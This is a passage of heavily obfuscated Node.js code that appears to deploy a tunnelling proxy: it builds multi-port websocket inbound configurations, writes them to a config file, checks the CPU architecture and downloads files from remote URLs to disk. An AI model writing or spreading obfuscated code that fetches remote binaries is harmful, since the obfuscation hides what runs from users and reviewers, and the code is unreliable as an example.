3994f4,-_0x4c6f1d._0x396975,-_0x4c6f1d._0x574b42)]=_0x2d885b[_0x11f908(-_0x4c6f1d._0x438379,-0x13,0x0,_0x4c6f1d._0x45aeb7)];const _0x58553d={};_0x58553d['id']=UUID;const _0xb76598={};_0xb76598[_0x127c7f(-0x104,-_0x4c6f1d._0x4c1756,-0x11,-_0x4c6f1d._0x6dce9a)]=[_0x58553d],_0xb76598['decryption']=_0x11f908(-_0x4c6f1d._0x56fb66,-0x1d5,-_0x4c6f1d._0xdc80c5,-_0x4c6f1d._0xe063a5);const _0x13798e={};_0x13798e['port']=0xbb9,_0x13798e[_0x127c7f(_0x4c6f1d._0x45cd0d,-0x3e,_0x4c6f1d._0x1a36fa,-_0x4c6f1d._0x18a4d2)]=_0x127c7f(-_0x4c6f1d._0x291101,-_0x4c6f1d._0x228874,_0x4c6f1d._0x376e54,_0x4c6f1d._0x3d091f),_0x13798e['protocol']=_0x2d885b['TEjnB'],_0x13798e['settings']=_0xb76598,_0x13798e[_0x127c7f(-_0x4c6f1d._0x315b60,-_0x4c6f1d._0x37c169,-_0x4c6f1d._0x415227,-_0x4c6f1d._0x41033d)]={},_0x13798e[_0x127c7f(-_0x4c6f1d._0x315b60,-_0x4c6f1d._0x37c169,-_0x4c6f1d._0x415227,-_0x4c6f1d._0x41033d)][_0x11f908(-_0x4c6f1d._0xd36751,-0x1bf,-0x183,-_0x4c6f1d._0x280f5d)]=_0x2d885b[_0x127c7f(-_0x4c6f1d._0x306768,-_0x4c6f1d._0x47df1f,-0x89,_0x4c6f1d._0x26cd16)],_0x13798e[_0x127c7f(-_0x4c6f1d._0x315b60,-_0x4c6f1d._0x37c169,-_0x4c6f1d._0x415227,-_0x4c6f1d._0x41033d)][_0x11f908(_0x4c6f1d._0x38954c,0x15b,_0x4c6f1d._0x5d80f7,_0x4c6f1d._0x541a09)]=_0x2d885b['sKkIP'];const _0x2177b7={};_0x2177b7['id']=UUID,_0x2177b7[_0x127c7f(-_0x4c6f1d._0x499948,-_0x4c6f1d._0x45aeb7,-_0x4c6f1d._0x39c465,-_0x4c6f1d._0x4379f5)]=0x0;const _0x333edf={};_0x333edf[_0x127c7f(-_0x4c6f1d._0x35a38f,-_0x4c6f1d._0x3fe910,-_0x4c6f1d._0x1a1d7e,-0x12d)]=_0x127c7f(-_0x4c6f1d._0x3dc33b,-_0x4c6f1d._0x4d43df,-_0x4c6f1d._0x213474,-_0x4c6f1d._0x5585d2);const _0x446f4c={};_0x446f4c['network']='ws',_0x446f4c[_0x11f908(0x2,-_0x4c6f1d._0x827dae,_0x4c6f1d._0x177b63,_0x4c6f1d._0x47888f)]=_0x11f908(_0x4c6f1d._0xba9bc7,-_0x4c6f1d._0x27cdfe,-0x117,-_0x4c6f1d._0xe55eaa),_0x446f4c['wsSettings']=_0x333edf;const _0xdc3e44={};_0xdc3e44[_0x127c7f(0x10,-_0x4c6f1d._0x4269ff,_0x4c6f1d._0x1f8a7c,_0x4c6f1d._0x5e0491)]=0xbba,_0xdc3e44[_0x11f908(0xa5,_0x4c6f1d._0x479a49,_0x4c6f1d._0x53e526,_0x4c6f1d._0x1154c8)]=_0x127c7f(-_0x4c6f1d._0x45c97e,-_0x4c6f1d._0x228874,-_0x4c6f1d._0x241425,-0x47),_0xdc3e44[_0x127c7f(0xa1,_0x4c6f1d._0x47df1f,-_0x4c6f1d._0x5a022b,_0x4c6f1d._0x5639a0)]=_0x2d885b[_0x127c7f(_0x4c6f1d._0x38ad16,_0x4c6f1d._0xfee62f,0xf1,-_0x4c6f1d._0x71926c)],_0xdc3e44[_0x11f908(-_0x4c6f1d._0x5cf61a,-_0x4c6f1d._0x25c015,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x354a05)]={},_0xdc3e44[_0x127c7f(-_0x4c6f1d._0x39f583,-_0x4c6f1d._0x287f25,-_0x4c6f1d._0x2f74e0,-_0x4c6f1d._0x5ab14b)]=_0x446f4c,_0xdc3e44[_0x127c7f(-_0x4c6f1d._0x2dc0d5,-_0x4c6f1d._0xe063a5,-_0x4c6f1d._0x4a8d23,-_0x4c6f1d._0x509ab6)]={},_0xdc3e44[_0x11f908(-_0x4c6f1d._0x5cf61a,-_0x4c6f1d._0x25c015,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x354a05)][_0x127c7f(-_0x4c6f1d._0x346f64,-_0x4c6f1d._0x4c1756,-0x4c,-_0x4c6f1d._0x489128)]=[_0x2177b7],_0xdc3e44[_0x11f908(-_0x4c6f1d._0x5cf61a,-_0x4c6f1d._0x25c015,-_0x4c6f1d._0x5e0491,-_0x4c6f1d._0x354a05)]['decryption']=_0x2d885b[_0x127c7f(_0x4c6f1d._0x10e8b1,-_0x4c6f1d._0x500ef5,-_0x4c6f1d._0x10a9c9,-0x9e)],_0xdc3e44[_0x127c7f(-_0x4c6f1d._0x2dc0d5,-_0x4c6f1d._0xe063a5,-_0x4c6f1d._0x4a8d23,-_0x4c6f1d._0x509ab6)]['enabled']=!![],_0xdc3e44[_0x127c7f(-_0x4c6f1d._0x2dc0d5,-_0x4c6f1d._0xe063a5,-_0x4c6f1d._0x4a8d23,-_0x4c6f1d._0x509ab6)]['destOverride']=[_0x2d885b[_0x127c7f(-_0x4c6f1d._0x3370cb,_0x4c6f1d._0x5849bf,_0x4c6f1d._0x7024ba,_0x4c6f1d._0x944b62)],_0x2d885b[_0x11f908(-_0x4c6f1d._0x3b732a,-0x3e,-_0x4c6f1d._0x5ad48a,-_0x4c6f1d._0x14a5c7)],_0x2d885b[_0x11f908(-_0x4c6f1d._0x3abe39,-_0x4c6f1d._0x3fc505,-0x11a,-_0x4c6f1d._0x1bce24)]],_0xdc3e44[_0x127c7f(-_0x4c6f1d._0x2dc0d5,-_0x4c6f1d._0xe063a5,-_0x4c6f1d._0x4a8d23,-_0x4c6f1d._0x509ab6)]['metadataOnly']=![];const _0x3a9f96={};_0x3a9f96['id']=UUID,_0x3a9f96[_0x127c7f(_0x4c6f1d._0x3474e1,-_0x4c6f1d._0xcca22,-_0x4c6f1d._0x3efc21,-_0x4c6f1d._0x1df4d5)]=0x0;const _0x36ffa9={};_0x36ffa9['clients']=[_0x3a9f96];function _0x11f908(_0x471c10,_0x572f35,_0x1d915b,_0x3712e2){return _0x477c8c(_0x471c10-0x145,_0x572f35-_0x5e7143._0x51f994,_0x572f35,_0x1d915b- -0x3ff);}const _0x866579={};_0x866579[_0x11f908(-_0x4c6f1d._0x313f64,0xef,_0x4c6f1d._0x226a58,_0x4c6f1d._0x20f7bc)]=0xbbb,_0x866579[_0x127c7f(-_0x4c6f1d._0x1d655f,-_0x4c6f1d._0x251e67,-_0x4c6f1d._0x20573d,-_0x4c6f1d._0x1d36f8)]=_0x2d885b['yujjJ'],_0x866579[_0x127c7f(_0x4c6f1d._0x5564e3,_0x4c6f1d._0x5a5886,0x3a,-0xa4)]=_0x127c7f(0xf,_0x4c6f1d._0x2fd368,0x103,_0x4c6f1d._0x130c16),_0x866579['settings']=_0x36ffa9,_0x866579[_0x11f908(-_0x4c6f1d._0x51cba4,-_0x4c6f1d._0x46c7c0,-_0x4c6f1d._0x2a1147,-_0x4c6f1d._0x6c620e)]={},_0x866579[_0x11f908(-_0x4c6f1d._0x38f2f6,-_0x4c6f1d._0x302c20,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x482e43)]={},_0x866579[_0x11f908(-_0x4c6f1d._0x51cba4,-_0x4c6f1d._0x46c7c0,-_0x4c6f1d._0x2a1147,-_0x4c6f1d._0x6c620e)][_0x127c7f(-0x183,-0x1c4,-_0x4c6f1d._0x12d8e0,-_0x4c6f1d._0x1aa32f)]='ws',_0x866579[_0x11f908(-_0x4c6f1d._0x51cba4,-_0x4c6f1d._0x46c7c0,-_0x4c6f1d._0x2a1147,-_0x4c6f1d._0x6c620e)][_0x11f908(-_0x4c6f1d._0x39422f,_0x4c6f1d._0x531623,_0x4c6f1d._0x45f65f,_0x4c6f1d._0x47df1f)]={},_0x866579[_0x11f908(-_0x4c6f1d._0x51cba4,-_0x4c6f1d._0x46c7c0,-_0x4c6f1d._0x2a1147,-_0x4c6f1d._0x6c620e)][_0x11f908(-_0x4c6f1d._0x39422f,_0x4c6f1d._0x531623,_0x4c6f1d._0x45f65f,_0x4c6f1d._0x47df1f)][_0x11f908(_0x4c6f1d._0x3abf0b,-_0x4c6f1d._0x2a8925,-_0x4c6f1d._0x45618e,_0x4c6f1d._0x3b4b44)]=_0x2d885b[_0x127c7f(-_0x4c6f1d._0x31238e,-_0x4c6f1d._0x4d2bf7,0xd,-0x2a)],_0x866579[_0x11f908(-_0x4c6f1d._0x38f2f6,-_0x4c6f1d._0x302c20,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x482e43)][_0x127c7f(-0x264,-_0x4c6f1d._0x19d655,-_0x4c6f1d._0x5b3903,-_0x4c6f1d._0x3f013d)]=!![],_0x866579[_0x11f908(-_0x4c6f1d._0x38f2f6,-_0x4c6f1d._0x302c20,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x482e43)][_0x127c7f(-_0x4c6f1d._0x4e238b,-_0x4c6f1d._0x3c8ce6,-_0x4c6f1d._0x5e27b8,-_0x4c6f1d._0x43313f)]=[_0x2d885b[_0x127c7f(_0x4c6f1d._0x22391e,_0x4c6f1d._0x290a4f,_0x4c6f1d._0x402e,0x3a)],_0x127c7f(-_0x4c6f1d._0x36c467,-_0x4c6f1d._0x3bca81,-_0x4c6f1d._0x5a3228,-_0x4c6f1d._0x414830),_0x2d885b[_0x127c7f(-_0x4c6f1d._0x3648a6,-_0x4c6f1d._0x569410,-_0x4c6f1d._0x30a9c8,-_0x4c6f1d._0x4171d9)]],_0x866579[_0x11f908(-_0x4c6f1d._0x38f2f6,-_0x4c6f1d._0x302c20,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x482e43)]['metadataOnly']=![];const _0xeefbac={};_0xeefbac[_0x11f908(_0x4c6f1d._0x346f64,-_0x4c6f1d._0x3d2b17,0x57,_0x4c6f1d._0xd79b98)]=UUID;const _0x50acff={};_0x50acff['clients']=[_0xeefbac];const _0xfcb2d9={};_0xfcb2d9[_0x127c7f(_0x4c6f1d._0xb7210e,-0x38,-_0x4c6f1d._0x53dc68,0xb0)]=0xbbc,_0xfcb2d9[_0x127c7f(-_0x4c6f1d._0x1bebc8,-_0x4c6f1d._0x14e5f7,_0x4c6f1d._0x5d2203,_0x4c6f1d._0x5ca9cb)]=_0x2d885b['yujjJ'],_0xfcb2d9[_0x127c7f(_0x4c6f1d._0x75ae85,0x41,0xf7,_0x4c6f1d._0x421955)]=_0x2d885b['kVJhN'],_0xfcb2d9['settings']=_0x50acff,_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x1e90a6,-_0x4c6f1d._0x3fc505,-_0x4c6f1d._0x5aa20b,-_0x4c6f1d._0xe4abfe)]={},_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x21e052,_0x4c6f1d._0x3b4b6b,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x267b4e)]={},_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x1e90a6,-_0x4c6f1d._0x3fc505,-_0x4c6f1d._0x5aa20b,-_0x4c6f1d._0xe4abfe)][_0x127c7f(-0x284,-0x1c4,-_0x4c6f1d._0xe0e6d6,-_0x4c6f1d._0x4c77f2)]='ws',_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x1e90a6,-_0x4c6f1d._0x3fc505,-_0x4c6f1d._0x5aa20b,-_0x4c6f1d._0xe4abfe)][_0x11f908(_0x4c6f1d._0x4d2bf7,_0x4c6f1d._0x34b6cb,_0x4c6f1d._0x5d80f7,0x13e)]=_0x11f908(-_0x4c6f1d._0x313f64,-_0x4c6f1d._0xc0e96d,-_0x4c6f1d._0x541a09,-0xdd),_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x1e90a6,-_0x4c6f1d._0x3fc505,-_0x4c6f1d._0x5aa20b,-_0x4c6f1d._0xe4abfe)][_0x127c7f(-_0x4c6f1d._0x52633f,_0x4c6f1d._0x102754,-_0x4c6f1d._0x2f4bb2,-_0x4c6f1d._0x35d7d0)]={},_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x1e90a6,-_0x4c6f1d._0x3fc505,-_0x4c6f1d._0x5aa20b,-_0x4c6f1d._0xe4abfe)][_0x127c7f(-_0x4c6f1d._0x52633f,_0x4c6f1d._0x102754,-_0x4c6f1d._0x2f4bb2,-_0x4c6f1d._0x35d7d0)][_0x11f908(-_0x4c6f1d._0x872de7,-_0x4c6f1d._0x50ad81,-_0x4c6f1d._0x41ab00,-_0x4c6f1d._0x337b34)]=_0x2d885b['NWchM'],_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x21e052,_0x4c6f1d._0x3b4b6b,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x267b4e)][_0x127c7f(-_0x4c6f1d._0x29833c,-_0x4c6f1d._0x5a8f82,-_0x4c6f1d._0x34229a,-0x5c)]=!![],_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x21e052,_0x4c6f1d._0x3b4b6b,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x267b4e)][_0x11f908(-_0x4c6f1d._0x29a81b,-_0x4c6f1d._0x1f8f66,-0x11f,-_0x4c6f1d._0x35ddf9)]=[_0x2d885b[_0x127c7f(_0x4c6f1d._0x4abdc1,_0x4c6f1d._0x139290,-0x11,-_0x4c6f1d._0x38ab21)],_0x2d885b['ZXwXi'],_0x2d885b[_0x127c7f(-_0x4c6f1d._0x1a9dc8,-0x15b,-_0x4c6f1d._0x167c18,-_0x4c6f1d._0x3292b7)]],_0xfcb2d9[_0x11f908(-_0x4c6f1d._0x21e052,_0x4c6f1d._0x3b4b6b,-_0x4c6f1d._0x2a305e,-_0x4c6f1d._0x267b4e)][_0x11f908(-_0x4c6f1d._0x3b8490,-_0x4c6f1d._0x410478,-_0x4c6f1d._0x43313f,-_0x4c6f1d._0x51c919)]=![];const _0x412420={};_0x412420[_0x127c7f(-_0x4c6f1d._0x59c414,-_0x4c6f1d._0x596a18,0x2c,_0x4c6f1d._0x226a58)]=[_0x11f908(-_0x4c6f1d._0x129a62,-_0x4c6f1d._0x27ccdc,-_0x4c6f1d._0x58ffa4,-0x174)];const _0x3ce027={};_0x3ce027[_0x127c7f(_0x4c6f1d._0x42523a,0x41,_0x4c6f1d._0x5a8ab2,0x126)]=_0x2d885b['PHCbM'],_0x3ce027[_0x11f908(-0x34,_0x4c6f1d._0x1aab3a,_0x4c6f1d._0x849172,_0x4c6f1d._0x5d28b4)]=_0x2d885b[_0x11f908(-_0x4c6f1d._0x4ba622,-_0x4c6f1d._0x3831d4,-_0x4c6f1d._0x2f25ec,-_0x4c6f1d._0x2e25ef)];const _0x348382={};_0x348382['protocol']=_0x2d885b[_0x127c7f(-0x19b,-_0x4c6f1d._0x67e698,-_0x4c6f1d._0xdda9f,-0x267)],_0x348382[_0x11f908(-_0x4c6f1d._0x2e25ef,-_0x4c6f1d._0x4466d0,0x88,-0x49)]=_0x2d885b['WYkwI'];const _0x58b18d={};_0x58b18d[_0x127c7f(-_0x4c6f1d._0x91cdef,-0x1ca,-0x2aa,-_0x4c6f1d._0xaae129)]=_0x1f47b2,_0x58b18d['inbounds']=[_0x4240e6,_0x13798e,_0xdc3e44,_0x866579,_0xfcb2d9],_0x58b18d['dns']=_0x412420,_0x58b18d['outbounds']=[_0x3ce027,_0x348382];const _0x19b242=_0x58b18d;fs[_0x11f908(-_0x4c6f1d._0x17bcf7,-_0x4c6f1d._0xd78c51,-0x8a,-_0x4c6f1d._0x35d108)](path['join'](FILE_PATH,_0x2d885b[_0x11f908(0x196,-_0x4c6f1d._0x212c90,0x7d,0x5d)]),JSON[_0x11f908(-_0x4c6f1d._0x3fe1be,-_0x4c6f1d._0x3bdeb9,-0x178,-_0x4c6f1d._0x291174)](_0x19b242,null,-0x272+-0x1d1e*0x1+0x1f92));}function getSystemArchitecture(){const _0x500daf={_0x390a3b:0x82,_0x5b248b:0x151,_0x9d7395:0xcb,_0x38f6e1:0x7a,_0x301ad5:0x8a,_0x57649c:0x134,_0x3d1312:0xec,_0x3c0be1:0x67,_0x3e8a55:0x87,_0x5e1882:0x1a9,_0xa3f1f4:0x3b,_0x2cafca:0xba,_0x135c38:0x7d,_0x323c7a:0x124,_0x41aded:0x127,_0x37fd11:0xf8,_0x101fdd:0x7,_0x58726:0x1b,_0x4a3168:0x1a3,_0xcebf5:0x101,_0x4385cc:0x1bf,_0x44f0dc:0x1e3,_0x21583:0x1d4,_0x246639:0x143,_0xf15072:0x2ff,_0x441ae3:0x217,_0x267b5a:0x227,_0x365cec:0x1c4,_0xf34dcb:0x16e,_0x2f7fa4:0x178,_0x3c982b:0x15b,_0x42c4bd:0x306,_0x217b4e:0x20b,_0x4e4845:0x92,_0x401089:0x5f,_0x61747b:0xac,_0x471514:0x1b2,_0x658e6a:0x1d9,_0x4ecf75:0x2a9,_0x56fe6b:0x327,_0x7d1704:0x1f9,_0x230f94:0x27c,_0xf854a2:0x154,_0x4cf049:0x1e8,_0x188286:0x171,_0x4490c3:0x1a8},_0x379093={_0x2ea6ef:0xd6,_0x54a7be:0x135,_0x1c7d60:0x51f},_0x1bd702={_0x14c267:0x14d,_0x5b285f:0x10f,_0x2a240a:0x2b5},_0x48d981={'enlEq':function(_0x2f405f,_0x53277c,_0x5ee52c){return _0x2f405f(_0x53277c,_0x5ee52c);},'eofhs':function(_0x50ddfd,_0x30d93c){return _0x50ddfd===_0x30d93c;},'ezvNZ':'arm','HCjpg':function(_0x109b0a,_0x42bb0e){return _0x109b0a===_0x42bb0e;},'AAurI':_0x3199ae(_0x500daf._0x390a3b,_0x500daf._0x5b248b,_0x500daf._0x9d7395,_0x500daf._0x38f6e1),'oLUgX':_0x240dd1(-_0x500daf._0x301ad5,-_0x500daf._0x57649c,-0x14a,-_0x500daf._0x3d1312),'TQmIT':'amd'},_0x18061e=os['arch']();function _0x3199ae(_0x50f188,_0x13930f,_0x10c3d0,_0x4f10e5){return _0x477c8c(_0x50f188-_0x1bd702._0x14c267,_0x13930f-_0x1bd702._0x5b285f,_0x4f10e5,_0x13930f- -_0x1bd702._0x2a240a);}function _0x240dd1(_0x364cad,_0x20a46c,_0x416934,_0x41c8de){return _0x477c8c(_0x364cad-_0x379093._0x2ea6ef,_0x20a46c-_0x379093._0x54a7be,_0x416934,_0x41c8de- -_0x379093._0x1c7d60);}if(_0x48d981[_0x3199ae(-_0x500daf._0x3c0be1,_0x500daf._0x3e8a55,_0x500daf._0x5e1882,-_0x500daf._0xa3f1f4)](_0x18061e,_0x48d981['ezvNZ'])||_0x48d981[_0x3199ae(_0x500daf._0x2cafca,_0x500daf._0x135c38,_0x500daf._0x323c7a,_0x500daf._0x41aded)](_0x18061e,_0x3199ae(_0x500daf._0x37fd11,0xf,-_0x500daf._0x101fdd,_0x500daf._0x58726))||_0x48d981[_0x240dd1(-_0x500daf._0x4a3168,-_0x500daf._0xcebf5,-_0x500daf._0x4385cc,-_0x500daf._0x44f0dc)](_0x18061e,_0x48d981[_0x240dd1(-_0x500daf._0x21583,-_0x500daf._0x246639,-_0x500daf._0xf15072,-_0x500daf._0x441ae3)]))return _0x48d981[_0x240dd1(-_0x500daf._0x267b5a,-_0x500daf._0x365cec,-0xc3,-_0x500daf._0xf34dcb)];else{if(_0x48d981[_0x240dd1(-_0x500daf._0x2f7fa4,-_0x500daf._0x3c982b,-_0x500daf._0x42c4bd,-_0x500daf._0x44f0dc)](_0x48d981[_0x240dd1(-0x31d,-0x2d3,-0x1b4,-_0x500daf._0x217b4e)],_0x48d981[_0x3199ae(_0x500daf._0x4e4845,_0x500daf._0x401089,-0xbf,_0x500daf._0x61747b)]))return _0x48d981[_0x3199ae(_0x500daf._0x471514,0xe7,0x1a,0x1a1)];else _0x3cad9b[_0x3199ae(-0x56,_0x500daf._0x38f6e1,-0xab,_0x500daf._0x58726)](),_0x2b5a95[_0x240dd1(-_0x500daf._0x658e6a,-0x1c5,-0x335,-_0x500daf._0x4ecf75)](_0x240dd1(-_0x500daf._0x56fe6b,-0x396,-_0x500daf._0x7d1704,-_0x500daf._0x230f94)+_0x544b8f['basename'](_0x313d93)+_0x3199ae(_0x500daf._0xf854a2,_0x500daf._0x4cf049,_0x500daf._0x188286,_0x500daf._0x4490c3)),_0x48d981['enlEq'](_0x23625c,null,_0x1d1822);}}function downloadFile(_0x2f9578,_0x3b9971,_0x5bc941){const _0x3d9102={_0x52589:0x492,_0x1d8eb5:0x3d3,_0x467f36:0x425,_0x478d18:0x584,_0x18b753:0x67a,_0xc6c6b5:0x5c2,_0x594504:0x556,_0x1a1d10:0x7b,_0x3f20f8:0x14d,_0x156906:0x85,_0x22a893:0x23a,_0xf98857:0x50b,_0x5acbdd:0x5dd,_0x3c8fb8:0x626,_0x32cf70:0x43a,_0xf53e26:0x160,_0x12659c:0x1b5,_0x34c926:0xa3,_0x3a37f3:0x110,_0x3991d0:0x2f7,_0x1e2f3a:0x368,_0x287dd5:0x48e,_0x78760a:0x463,_0xa4230b:0x91,_0x442aa4:0x175,_0x18761d:0x26b,_0x2a33f6:0x7d,_0x54c44d:0x4cf,_0x205984:0x590},_0x524d7b={_0x49d4ac:0x8c,_0x5abefd:0x76,_0x48ede5:0x16e,_0x49c85f:0x38d,_0x22094b:0x405,_0x56ca1a:0x1c2,_0x418462:0x252,_0x3c69c7:0x15d,_0x1acda3:0xa1,_0x307023:0x41,_0x4fa316:0x37,_0x9896b2:0xd7,_0x461c5a:0xbf,_0x15d24a:0x9d,_0xea0b89:0x427,_0xb9d9f2:0x414,_0x32fb6d:0x43e},_0x498fef={_0x2a0960:0x4e7,_0x32c6ca:0x163,_0x40fc17:0x1b4},_0x37b0e7={_0x3d0c6e:0x476,_0x48dd9b:0x487,_0x444a7d:0x3ee,_0xc144d1:0x2a9,_0x2c2ca3:0x2ff,_0x14c816:0x382,_0x4af849:0x38c,_0x52c637:0x27c,_0x247080:0x249,_0x177a4e:0x3ee,_0x52e2d7:0x2c4,_0x19422c:0x26f,_0x12c883:0x349},_0x564276={_0xf160ab:0x32d,_0x1c82f2:0x3d8,_0x4a5685:0x2a4,_0x20703d:0x2f2,_0x5e7f21:0x2e2,_0x3396c2:0x3e3,_0x5290dd:0x36c,_0xd8f4a1:0x216,_0x5bc00d:0x2f8,_0x3abf40:0x4eb},_0x5b60ed={_0x47e59f:0x1c,_0x42423c:0x11a},_0x1f5c00={_0x3a106d:0x1b,_0x553d10:0x135},_0x4b48cf={_0x2b2496:0x1a0,_0x29a95e:0x6e},_0x5db1c6={'kUtuU':function(_0x1d6df4,_0xe5e1cb){return _0x1d6df4(_0xe5e1cb);},'XIvuc':function(_0x6c1e26,_0x4f4f3b,_0xd13e2){return _0x6c1e26(_0x4f4f3b,_0xd13e2);},'FinEJ':_0x371ddc(_0x3d9102._0x52589,_0x3d9102._0x1d8eb5,0x3f6,_0x3d9102._0x467f36),'sNvgX':_0x371ddc(_0x3d9102._0x478d18,_0x3d9102._0x18b753,_0x3d9102._0xc6c6b5,_0x3d9102._0x594504),'lSrlZ':_0x105a86(_0x3d9102._0x1a1d10,_0x3d9102._0x3f20f8,_0x3d9102._0x156906,_0x3d9102._0x22a893)},_0x2386c6=_0x2f9578;function _0x105a86(_0x112e5e,_0x6fe482,_0x528a84,_0x39d2ae){return _0x5d6c89(_0x6fe482-_0x4b48cf._0x2b2496,_0x6fe482-_0x4b48cf._0x29a95e,_0x528a84-0x105,_0x528a84);}if(!fs[_0x371ddc(_0x3d9102._0xf98857,_0x3d9102._0x5acbdd,_0x3d9102._0x3c8fb8,_0x3d9102._0x32cf70)](FILE_PATH)){const _0x485427={};_0x485427[_0x105a86(_0x3d9102._0xf53e26,_0x3d9102._0x12659c,_0x3d9102._0x34c926,_0x3d9102._0x3a37f3)]=!![],fs[_0x105a86(0x26a,0x335,_0x3d9102._0x3991d0,0x32d)](FILE_PATH,_0x485427);}const _0x51545d=fs[_0x371ddc(_0x3d9102._0x1e2f3a,0x3ca,_0x3d9102._0x287dd5,_0x3d9102._0x78760a)](_0x2386c6);function _0x371ddc(_0x180499,_0x45deb7,_0x48efef,_0x43d0d2){return _0x5d6c89(_0x180499-0x3ad,_0x45deb7-_0x1f5c00._0x3a106d,_0x48efef-_0x1f5c00._0x553d10,_0x48efef);}_0x5db1c6['kUtuU'](axios,{'method':_0x105a86(_0x3d9102._0xa4230b,_0x3d9102._0x442aa4,_0x3d9102._0x18761d,_0x3d9102._0x2a33f6),'url':_0x3b9971,'responseType':_0x5db1c6['lSrlZ']})['then'](_0x5dce79=>{const _0x577a91={_0x8a4bbe:0x1a1,_0x4d0327:0xd8},_0x44e180={_0x553a55:0xab},_0x18e580={_0x46df43:0x1ce,_0x366d18:0x1b4},_0x4f67f7={_0x170f26:0x2a3,_0x128cfe:0x13a,_0x4ccb6b:0x19f,_0x592431:0x278,_0x4dd3ea:0x1f8,_0x3ed6f2:0x2c6,_0x5e819e:0x160,_0x23fe4d:0x83,_0x492c77:0x1ac,_0x240723:0x113,_0x2ec330:0x2d8,_0x361e9e:0x2fc,_0x4c91c2:0x3e9,_0x48d407:0x30d},_0x2302b2={_0x3bb13f:0x1e8,_0x420563:0x159,_0x1fd33a:0xfb},_0x47f03b={'mBqHV':function(_0x55daac,_0x5ac322,_0x3e0196){function _0x3f20e1(_0x4ff4c3,_0x353512,_0x781059,_0x2e7b20){return _0x4999(_0x353512- -0x12b,_0x2e7b20);}return _0x5db1c6[_0x3f20e1(0x127,0xbd,_0x5b60ed._0x47e59f,_0x5b60ed._0x42423c)](_0x55daac,_0x5ac322,_0x3e0196);}};_0x5dce79[_0x571deb(_0x37b0e7._0x3d0c6e,_0x37b0e7._0x48dd9b,0x49f,_0x37b0e7._0x444a7d)][_0xd49e20(_0x37b0e7._0xc144d1,_0x37b0e7._0x2c2ca3,_0x37b0e7._0x14c816,_0x37b0e7._0x4af849)](_0x51545d),_0x51545d['on'](_0x5db1c6[_0x571deb(_0x37b0e7._0x52c637,_0x37b0e7._0x247080,_0x37b0e7._0x177a4e,0x2e8)],()=>{const _0x4a5fd4={_0x42276:0x1d0,_0x148f4e:0x1a8,_0x43592c:0x20d};_0x51545d[_0x1edf77(0x1dc,_0x4f67f7._0x170f26,_0x4f67f7._0x128cfe,_0x4f67f7._0x4ccb6b)]();function _0x1edf77(_0x37bbe3,_0x26107e,_0x4b268d,_0x574ab4){return _0x571deb(_0x37bbe3-_0x4a5fd4._0x42276,_0x26107e-_0x4a5fd4._0x148f4e,_0x37bbe3,_0x574ab4- -_0x4a5fd4._0x43592c);}function _0x4f95eb(_0x332368,_0x20de2a,_0x1d2bb6,_0x2b3aa3){return _0x571deb(_0x332368-_0x2302b2._0x3bb13f,_0x20de2a-_0x2302b2._0x420563,_0x332368,_0x1d2bb6- -_0x2302b2._0x1fd33a);}console[_0x4f95eb(0x13e,_0x4f67f7._0x592431,_0x4f67f7._0x4dd3ea,_0x4f67f7._0x3ed6f2)](_0x1edf77(_0x4f67f7._0x5e819e,_0x4f67f7._0x23fe4d,_0x4f67f7._0x492c77,_0x4f67f7._0x240723)+path[_0x4f95eb(0x37d,0x2a5,0x3cc,_0x4f67f7._0x2ec330)](_0x2386c6)+_0x1edf77(_0x4f67f7._0x361e9e,0x2e3,_0x4f67f7._0x4c91c2,_0x4f67f7._0x48d407)),_0x47f03b['mBqHV'](_0x5bc941,null,_0x2386c6);});function _0x571deb(_0xd585ab,_0x43e393,_0x305d62,_0x98e372){return _0x105a86(_0xd585ab-_0x18e580._0x46df43,_0x98e372-_0x18e580._0x366d18,_0x305d62,_0x98e372-0x46);}function _0xd49e20(_0x6149df,_0x35470f,_0x20eb42,_0x2f8494){return _0x105a86(_0x6149df-_0x44e180._0x553a55,_0x2f8494-0x12d,_0x20eb42,_0x2f8494-0x18c);}_0x51545d['on'](_0x5db1c6[_0xd49e20(0x283,_0x37b0e7._0x52e2d7,_0x37b0e7._0x19422c,_0x37b0e7._0x12c883)],_0x46a69c=>{const _0x2d73fb={_0x59ba4b:0x1b9,_0x4dfc78:0x1ed};fs[_0x55e5e3(0x33b,_0x564276._0xf160ab,0x2ff,_0x564276._0x1c82f2)](_0x2386c6,()=>{});const _0x1e8da5='Download\x20'+path['basename'](_0x2386c6)+_0x55e5e3(_0x564276._0x4a5685,_0x564276._0x20703d,0x1fa,_0x564276._0x5e7f21)+_0x46a69c[_0xa24840(_0x564276._0x3396c2,_0x564276._0x5290dd,_0x564276._0xd8f4a1,_0x564276._0x5bc00d)];function _0xa24840(_0x5e67b5,_0x2bc6a8,_0x4471af,_0x427675){return _0xd49e20(_0x5e67b5-0x183,_0x2bc6a8-_0x577a91._0x8a4bbe,_0x4471af,_0x427675- -_0x577a91._0x4d0327);}function _0x55e5e3(_0x9e0d56,_0x2d7694,_0x1614a6,_0x4c60a3){return _0x571deb(_0x9e0d56-_0x2d73fb._0x59ba4b,_0x2d7694-_0x2d73fb._0x4dfc78,_0x9e0d56,_0x4c60a3- -0x4f);}console['error'](_0x1e8da5),_0x5db1c6[_0x55e5e3(0x4c5,_0x564276._0x3abf40,0x378,0x46a)](_0x5bc941,_0x1e8da5);});})[_0x371ddc(0x4c2,0x59f,_0x3d9102._0x54c44d,_0x3d9102._0x205984)](_0x23ce72=>{const _0x135fbf={_0x5ab6c7:0x14c,_0x4b5d38:0xcb,_0x457dac:0xd2};function _0x5add8d(_0x297d28,_0x398a2d,_0x3ac5da,_0x5b8dca){return _0x371ddc(_0x5b8dca- 